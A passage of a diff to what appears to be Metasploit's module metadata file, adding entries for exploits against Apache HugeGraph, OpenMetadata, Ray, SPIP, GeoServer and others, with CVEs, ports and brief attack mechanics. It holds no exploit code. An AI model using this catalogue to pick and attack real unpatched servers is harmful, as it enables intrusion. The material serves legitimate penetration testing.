+    "fullname": "encoder/php/hex",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": null,
+    "type": "encoder",
+    "author": [
+      "Julien Voisin"
+    ],
+    "description": "This encoder returns a hex string encapsulated in\n        eval(hex2bin()), increasing the size by a bit more than\n        a factor two.",
+    "references": [
+
+    ],
+    "platform": "All",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-08-28 10:46:48 +0000",
+    "path": "/modules/encoders/php/hex.rb",
+    "is_install_path": true,
+    "ref_name": "php/hex",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "encoder_php/minify": {
+    "name": "PHP Minify Encoder",
+    "fullname": "encoder/php/minify",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": null,
+    "type": "encoder",
+    "author": [
+      "Julien Voisin"
+    ],
+    "description": "This encoder minifies a PHP payload by removing leasing spaces, trailing\n        new lines, comments, …",
+    "references": [
+
+    ],
+    "platform": "All",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-09-01 22:53:17 +0000",
+    "path": "/modules/encoders/php/minify.rb",
+    "is_install_path": true,
+    "ref_name": "php/minify",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "encoder_ppc/longxor": {
    "name": "PPC LongXOR Encoder",
    "fullname": "encoder/ppc/longxor",
@@ -66350,7 +66670,7 @@
      "Citrix ADC 12.1-65.25",
      "Citrix ADC 12.1-64.17"
    ],
-    "mod_time": "2023-08-07 12:50:23 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb",
    "is_install_path": true,
    "ref_name": "freebsd/http/citrix_formssso_target_rce",
@@ -67943,6 +68263,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_hugegraph_gremlin_rce": {
+    "name": "Apache HugeGraph Gremlin RCE",
+    "fullname": "exploit/linux/http/apache_hugegraph_gremlin_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-22",
+    "type": "exploit",
+    "author": [
+      "6right",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in\n          Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve\n          RCE through Gremlin, resulting in complete control over the server",
+    "references": [
+      "URL-https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/",
+      "CVE-2024-27348"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-08-13 08:48:33 +0000",
+    "path": "/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_hugegraph_gremlin_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_nifi_h2_rce": {
    "name": "Apache NiFi H2 Connection String Remote Code Execution",
    "fullname": "exploit/linux/http/apache_nifi_h2_rce",
@@ -68312,7 +68692,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2023-10-10 15:21:35 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/apache_superset_cookie_sig_rce",
@@ -70722,7 +71102,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_diagnostic_exec_noauth",
@@ -70880,7 +71260,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/http/dlink_dir615_up_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dir615_up_exec",
@@ -71366,7 +71746,7 @@
      "Dlink DIR-818 / 822 / 823 / 850 [MIPS]",
      "Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-09-05 08:49:32 +0000",
    "path": "/modules/exploits/linux/http/dlink_hnap_login_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_hnap_login_bof",
@@ -71764,11 +72144,16 @@
    "type": "exploit",
    "author": [
      "Spencer McIntyre",
-      "Erik Daguerre"
+      "Erik Daguerre",
+      "ACE-Responder",
+      "Takahiro Yokoyama"
    ],
-    "description": "A vulnerability existed in the PowerShellEmpire server prior to commit\n        f030cf62 which would allow an arbitrary file to be written to an\n        attacker controlled location with the permissions of the Empire server.\n\n        This exploit will write the payload to /tmp/ directory followed by a\n        cron.d file to execute the payload.",
+    "description": "A vulnerability existed in the new Empire (maintained by BC Security)\n          prior to commit e73e883 (<v5.9.3) or the original PowerShellEmpire\n          server prior to commit f030cf62 which would allow an arbitrary file\n          to be written to an attacker controlled location with the permissions\n          of the Empire server.\n\n          This exploit will write the payload to /tmp/ directory followed by a\n          cron.d file to execute the payload.",
    "references": [
-      "URL-http://www.harmj0y.net/blog/empire/empire-fails/"
+      "CVE-2024-6127",
+      "URL-https://blog.harmj0y.net/empire/empire-fails/",
+      "URL-https://aceresponder.com/blog/exploiting-empire-c2-framework",
+      "URL-https://github.com/ACE-Responder/Empire-C2-RCE-PoC/tree/main"
    ],
    "platform": "Linux,Python",
    "arch": "",
@@ -71793,7 +72178,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2024-07-31 12:54:09 +0000",
    "path": "/modules/exploits/linux/http/empire_skywalker.rb",
    "is_install_path": true,
    "ref_name": "linux/http/empire_skywalker",
@@ -72643,7 +73028,7 @@
    "targets": [
      "FortiOS"
    ],
-    "mod_time": "2022-10-18 00:51:28 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/fortinet_authentication_bypass_cve_2022_40684.rb",
    "is_install_path": true,
    "ref_name": "linux/http/fortinet_authentication_bypass_cve_2022_40684",
@@ -72764,7 +73149,7 @@
      "Linux ",
      "Unix Command"
    ],
-    "mod_time": "2023-02-24 13:33:10 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/froxlor_log_path_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/froxlor_log_path_rce",
@@ -73797,7 +74182,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2022-02-25 08:32:06 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb",
    "is_install_path": true,
    "ref_name": "linux/http/hikvision_cve_2021_36260_blind",
@@ -75471,7 +75856,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/http/linksys_e1500_apply_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/linksys_e1500_apply_exec",
@@ -75693,7 +76078,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/linksys_wrt54gl_apply_exec",
@@ -77291,7 +77676,7 @@
      "CMD",
      "Linux mipsbe Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/netgear_dgn1000b_setup_exec",
@@ -77345,7 +77730,7 @@
      "CMD",
      "Linux mipsbe Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/netgear_dgn2200b_pppoe_exec",
@@ -78063,6 +78448,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/openmetadata_auth_bypass_rce": {
+    "name": "OpenMetadata authentication bypass and SpEL injection exploit chain",
+    "fullname": "exploit/linux/http/openmetadata_auth_bypass_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-15",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Alvaro Muñoz alias pwntester (https://github.com/pwntester)"
+    ],
+    "description": "OpenMetadata is a unified platform for discovery, observability, and governance powered\n          by a central metadata repository, in-depth lineage, and seamless team collaboration.\n          This module chains two vulnerabilities that exist in the OpenMetadata aplication.\n          The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.\n          It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded\n          endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters\n          to make any path contain any arbitrary strings that will match the excluded endpoint condition\n          and therefore will be processed with no JWT validation allowing an attacker to bypass the\n          authentication mechanism and reach any arbitrary endpoint.\n          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection\n          at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers\n          are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any\n          authentication.\n          OpenMetadata versions `1.2.3` and below are vulnerable.",
+    "references": [
+      "CVE-2024-28255",
+      "CVE-2024-28254",
+      "URL-https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/",
+      "URL-https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255",
+      "URL-https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8585,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-08-06 21:00:06 +0000",
+    "path": "/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/openmetadata_auth_bypass_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/opennms_horizon_authenticated_rce": {
    "name": "OpenNMS Horizon Authenticated RCE",
    "fullname": "exploit/linux/http/opennms_horizon_authenticated_rce",
@@ -79792,6 +80241,137 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/ray_agent_job_rce": {
+    "name": "Ray Agent Job RCE",
+    "fullname": "exploit/linux/http/ray_agent_job_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-11-15",
+    "type": "exploit",
+    "author": [
+      "sierrabearchell",
+      "byt3bl33d3r <marcello@protectai.com>",
+      "Takahiro Yokoyama"
+    ],
+    "description": "RCE in Ray via the agent job submission endpoint.\n          This is intended functionality as Ray's main purpose is executing arbitrary workloads.\n          By default Ray has no authentication.",
+    "references": [
+      "CVE-2023-48022",
+      "URL-https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/",
+      "URL-https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8265,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux x64",
+      "Linux x86",
+      "Linux aarch64",
+      "Linux Command"
+    ],
+    "mod_time": "2024-08-21 21:38:37 +0000",
+    "path": "/modules/exploits/linux/http/ray_agent_job_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ray_agent_job_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019": {
+    "name": "Ray cpu_profile command injection",
+    "fullname": "exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-11-15",
+    "type": "exploit",
+    "author": [
+      "sierrabearchell",
+      "byt3bl33d3r <marcello@protectai.com>",
+      "Takahiro Yokoyama"
+    ],
+    "description": "Ray RCE via cpu_profile command injection vulnerability.",
+    "references": [
+      "CVE-2023-6019",
+      "URL-https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8265,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux x64",
+      "Linux x86",
+      "Linux aarch64",
+      "Linux Command"
+    ],
+    "mod_time": "2024-08-21 22:32:53 +0000",
+    "path": "/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/rconfig_ajaxarchivefiles_rce": {
    "name": "Rconfig 3.x Chained Remote Code Execution",
    "fullname": "exploit/linux/http/rconfig_ajaxarchivefiles_rce",
@@ -82641,7 +83221,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-03-11 12:17:30 +0000",
+    "mod_time": "2024-09-05 08:49:32 +0000",
    "path": "/modules/exploits/linux/http/vestacp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/vestacp_exec",
@@ -84498,7 +85078,7 @@
      "Linux Dropper",
      "Interactive SSH"
    ],
-    "mod_time": "2023-05-10 07:46:11 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zyxel_lfi_unauth_ssh_rce",
@@ -91631,7 +92211,7 @@
    "targets": [
      "TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)"
    ],
-    "mod_time": "2023-02-08 15:46:07 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/tplink_archer_a7_c7_lan_rce",
@@ -92675,7 +93255,7 @@
    "targets": [
      "Linux x86"
    ],
-    "mod_time": "2023-01-04 14:45:58 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/linux/smtp/exim4_dovecot_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/smtp/exim4_dovecot_exec",
@@ -93259,7 +93839,7 @@
    "targets": [
      "Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40"
    ],
-    "mod_time": "2022-04-18 20:09:52 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/microfocus_obr_shrboadmin",
@@ -98424,7 +99004,7 @@
    "needs_cleanup": true
  },
  "exploit_multi/http/apache_ofbiz_forgot_password_directory_traversal": {
-    "name": "Apache OFBiz Forgot Password Directory Traversal",
+    "name": "Apache OFBiz forgotPassword/ProgramExport RCE",
    "fullname": "exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal",
    "aliases": [

@@ -98436,11 +99016,12 @@
      "Mr-xn",
      "jheysel-r7"
    ],
-    "description": "Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable\n          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in\n          turn allows for remote code execution in the context of the user running the application.",
+    "description": "Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability (CVE-2024-32113). The\n          vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint\n          which in turn allows for remote code execution in the context of the user running the application. This was\n          patched in 18.12.14.\n\n          It was then discovered that the use of the path traversal vulnerability is not required in order to access\n          the vulnerable endpoint ProgramExport. CVE-2024-38856 was given for this Incorrect Authorization vulnerability\n          and was patched in 18.12.15.\n\n          This module was originally written the exploit CVE-2024-32113, but upon the discovery of CVE-2024-38856 the\n          module updated to not exploit the path traversal vulnerability allowing for exploitation on 18.12.14 as well.",
    "references": [
      "URL-https://github.com/Mr-xn/CVE-2024-32113",
      "URL-https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113",
-      "CVE-2024-32113"
+      "CVE-2024-32113",
+      "CVE-2024-38856"
    ],
    "platform": "Linux,Windows",
    "arch": "cmd",
@@ -98464,7 +99045,7 @@
      "Linux Command",
      "Windows Command"
    ],
-    "mod_time": "2024-06-14 16:59:55 +0000",
+    "mod_time": "2024-08-16 12:17:56 +0000",
    "path": "/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_ofbiz_forgot_password_directory_traversal",
@@ -99185,7 +99766,7 @@
      "Linux",
      "Windows"
    ],
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/atutor_upload_traversal.rb",
    "is_install_path": true,
    "ref_name": "multi/http/atutor_upload_traversal",
@@ -99482,7 +100063,7 @@
    "targets": [
      "Bassmaster <= 1.5.1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/multi/http/bassmaster_js_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/bassmaster_js_injection",
@@ -100870,7 +101451,7 @@
    "targets": [
      "CasinoLoader gateway.php"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-06-06 14:53:28 +0000",
    "path": "/modules/exploits/multi/http/dexter_casinoloader_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/dexter_casinoloader_exec",
@@ -101482,17 +102063,19 @@
    "author": [
      "h00die-gr3y <h00die.gr3y@gmail.com>",
      "jheysel-r7",
-      "Steve Ikeoka"
+      "Steve Ikeoka",
+      "Valentin Lobstein a.k.a chocapikk"
    ],
    "description": "GeoServer is an open-source software server written in Java that provides\n          the ability to view, edit, and share geospatial data.\n          It is designed to be a flexible, efficient solution for distributing geospatial data\n          from a variety of sources such as Geographic Information System (GIS) databases,\n          web-based data, and personal datasets.\n          In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,\n          multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users\n          through specially crafted input against a default GeoServer installation due to unsafely\n          evaluating property names as XPath expressions.\n          An attacker can abuse this by sending a POST request with a malicious xpath expression\n          to execute arbitrary commands as root on the system.",
    "references": [
      "CVE-2024-36401",
      "URL-https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv",
      "URL-https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401",
-      "URL-https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401"
+      "URL-https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401",
+      "URL-https://github.com/Chocapikk/CVE-2024-36401"
    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64, aarch64, armle",
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
    "rport": 8080,
    "autofilter_ports": [
      80,
@@ -101511,10 +102094,9 @@
    ],
    "targets": [
      "Unix Command",
-      "Linux Dropper",
      "Windows Command"
    ],
-    "mod_time": "2024-07-16 11:20:35 +0000",
+    "mod_time": "2024-08-16 09:39:38 +0000",
    "path": "/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb",
    "is_install_path": true,
    "ref_name": "multi/http/geoserver_unauth_rce_cve_2024_36401",
@@ -102158,7 +102740,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-02-08 15:20:32 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/gitlab_file_read_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitlab_file_read_rce",
@@ -102222,7 +102804,7 @@
    "targets": [
      "Unix Command"
    ],
-    "mod_time": "2023-06-06 17:43:22 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitlab_github_import_rce_cve_2022_2992",
@@ -105950,7 +106532,7 @@
      "Unix CMD",
      "Linux Payload"
    ],
-    "mod_time": "2022-03-11 12:08:51 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/multi/http/mutiny_subnetmask_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/mutiny_subnetmask_exec",
@@ -106749,56 +107331,6 @@
    "session_types": false,
    "needs_cleanup": null
  },
-  "exploit_multi/http/openmediavault_cmd_exec": {
-    "name": "OpenMediaVault Cron Remote Command Execution",
-    "fullname": "exploit/multi/http/openmediavault_cmd_exec",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2013-10-30",
-    "type": "exploit",
-    "author": [
-      "Brandon Perry <bperry.volatile@gmail.com>"
-    ],
-    "description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
-    "references": [
-      "CVE-2013-3632",
-      "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": 80,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
-    "path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
-    "is_install_path": true,
-    "ref_name": "multi/http/openmediavault_cmd_exec",
-    "check": false,
-    "post_auth": true,
-    "default_credential": false,
-    "notes": {
-    },
-    "session_types": false,
-    "needs_cleanup": null
-  },
  "exploit_multi/http/openmrs_deserialization": {
    "name": "OpenMRS Java Deserialization RCE",
    "fullname": "exploit/multi/http/openmrs_deserialization",
@@ -108378,7 +108910,7 @@
    "targets": [
      "PHPStudy 2016-2018"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/phpstudy_backdoor_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/phpstudy_backdoor_rce",
@@ -109253,7 +109785,7 @@
    "targets": [
      "Ruby on Rails 4.0.8 July 2, 2014"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/rails_dynamic_render_code_exec",
@@ -110213,6 +110745,267 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/spip_bigup_unauth_rce": {
+    "name": "SPIP BigUp Plugin Unauthenticated RCE",
+    "fullname": "exploit/multi/http/spip_bigup_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-09-06",
+    "type": "exploit",
+    "author": [
+      "Vozec",
+      "Laluka",
+      "Julien Voisin",
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.\n          The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered\n          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper\n          handling of multipart form data in file uploads, an attacker can inject and execute\n          arbitrary PHP code on the target server.\n\n          This critical vulnerability affects all versions of SPIP from 4.0 up to and including\n          4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code\n          remotely via the public interface. The vulnerability has been patched in versions\n          4.3.2, 4.2.16, and 4.1.18.",
+    "references": [
+      "CVE-2024-8517",
+      "URL-https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/",
+      "URL-https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "ARCH_PHP, ARCH_CMD",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-09-11 11:46:52 +0000",
+    "path": "/modules/exploits/multi/http/spip_bigup_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/spip_bigup_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_multi/http/spip_connect_exec": {
+    "name": "SPIP connect Parameter PHP Injection",
+    "fullname": "exploit/multi/http/spip_connect_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2012-07-04",
+    "type": "exploit",
+    "author": [
+      "Arnaud Pachot",
+      "Frederic Cikala",
+      "Davy Douhine",
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits a PHP code injection vulnerability in SPIP. The vulnerability exists\n          in the connect parameter, allowing an unauthenticated user to execute arbitrary commands\n          with web user privileges. Branches 2.0, 2.1, and 3 are affected. Vulnerable versions are\n          < 2.0.21, < 2.1.16, and < 3.0.3. This module is compatible with both Unix/Linux and Windows\n          platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20 on Apache running\n          on Ubuntu, Fedora, and Windows Server.",
+    "references": [
+      "OSVDB-83543",
+      "BID-54292",
+      "URL-http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-09-08 07:01:23 +0000",
+    "path": "/modules/exploits/multi/http/spip_connect_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/spip_connect_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
